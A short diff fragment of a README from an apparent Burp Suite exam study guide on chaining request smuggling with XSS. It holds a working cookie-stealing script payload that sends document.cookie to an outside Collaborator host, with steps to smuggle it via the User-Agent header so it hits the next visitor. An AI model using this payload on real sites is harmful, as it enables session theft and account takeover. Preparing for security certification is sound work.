botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 a"/><script>document.location='http://Collaborator.oastify.com/cookiestealer.php?c='+document.cookie;</script>
 ```

 >Smuggle this XSS request to the back-end server, so that it exploits the next visitor.
+Place the XSS cookie stealer in UserAgent header.

 ```html
 POST / HTTP/1.1